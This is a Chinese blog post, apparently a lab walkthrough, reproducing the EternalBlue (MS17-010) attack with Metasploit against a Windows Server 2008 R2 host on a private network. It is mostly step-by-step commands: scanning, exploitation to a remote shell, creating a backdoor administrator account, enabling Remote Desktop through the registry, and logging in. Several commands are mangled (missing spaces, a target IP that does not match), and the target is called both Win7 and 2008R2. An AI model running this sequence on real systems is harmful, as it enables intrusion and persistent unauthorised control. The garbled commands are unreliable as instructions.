永恒之蓝漏洞复现

永恒之蓝漏洞复现

清明节闲得无聊,突然想起2017年差不多这时候爆发的利用永恒之蓝漏洞进行传播的雷索病毒,今天又重现了一下,顺便记录一下。
概述:永恒之蓝漏洞有多危险,只要开着机,且开启445端口(文件共享端口)攻击者可以获得计算机的权限,能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
复现场景:
攻击机:Linux kali(IP:192.168.114.131)
靶机:Windows 2008R2 (IP:192.168.114.147)
复现流程大致是这样的:
MSF框架---->使用auxiliary模块扫描–>使用exploit攻击获取目标shell–>添加用户—>修改目标远程桌面连接项–>远程连接

下面开始复现:

1、使用nmap探测目标
nmap -r 192.168.114.147
永恒之蓝漏洞复现探测结果显示445端口是开启的,有可能存在永恒之蓝漏洞,但是还不能确定,因为它有可能打了补丁;接下来使用MSF攻击框架,使用EXP进行进一步确定。

2、打开msf框架 msfconsole :
永恒之蓝漏洞复现搜索ms17-010代码 search ms17_010 :
永恒之蓝漏洞复现这里可以得到两个工具,其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

3.使用ms17-010扫描模块,对靶机Win7进行扫描
使用模块: use auxiliary/scanner/smb/smb_ms17_010
永恒之蓝漏洞复现

(可以使用info命令进行查看需要配置项)
永恒之蓝漏洞复现
设置目标ip或网段
msfauxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.114.147
永恒之蓝漏洞复现执行扫描: msfauxiliary(scanner/smb/smb_ms17_010) > run
永恒之蓝漏洞复现可以发现目标主机存在永恒之蓝漏洞的,接下来使用EXP攻击模块进行攻击。

  1. 使用ms17-010攻击模块,对靶机Win7进行攻击
    使用模块
    msf> use exploit/windows/smb/ms17_010_eternalblue
    永恒之蓝漏洞复现同样需要配置攻击目标IP。

设置攻击目标ip
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST192.168.23.133
永恒之蓝漏洞复现
查看设置选项
msfexploit(windows/smb/ms17_010_eternalblue) > show options
永恒之蓝漏洞复现至此,攻击模块可以使用了,接下来就见证奇迹的时候了,发起攻击。

执行攻击
msfexploit(windows/smb/ms17_010_eternalblue) > run
永恒之蓝漏洞复现经过攻击获得了目标的metepreter(一种shell)。在这里输入shell就可以获得目标的cmd终端。
永恒之蓝漏洞复现至此我们已经拿到了目标主机的命令终端,可以执行任何命令了,比如查看系统信息:
永恒之蓝漏洞复现
但是这不是我们的终点,我们要的是直接拿到桌面,所以接下来就要创建账户。

5.通过shell对目标服务器进行控制

创建新用户zzn : netuser zzz 123456 /add
永恒之蓝漏洞复现
将用户zzz添加至管理员组 : netlocalgroup administrators zzz /add
永恒之蓝漏洞复现

开启远程桌面功能

REGADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /vfDenyTSConnections /t REG_DWORD /d 0 /f
永恒之蓝漏洞复现到这里我们已经配置好了目标主机,只需要一步就能到达对方的桌面,那就是远程桌面连接。
kali 远程桌面连接目标服务器:

rdesktop192.168.114.147:3389
永恒之蓝漏洞复现
回车之后见证奇迹:
永恒之蓝漏洞复现
永恒之蓝漏洞复现成功连接到了对方服务器的桌面,一切努力只为了这一步,此时我们可以“为所欲为”了。
永恒之蓝漏洞复现永恒之蓝漏洞复现

上一篇:Gym 101170A Arranging Hat dp


下一篇:使用Kali系统对Windows7和Server2008R2进行***测试(MS17-010漏洞利用)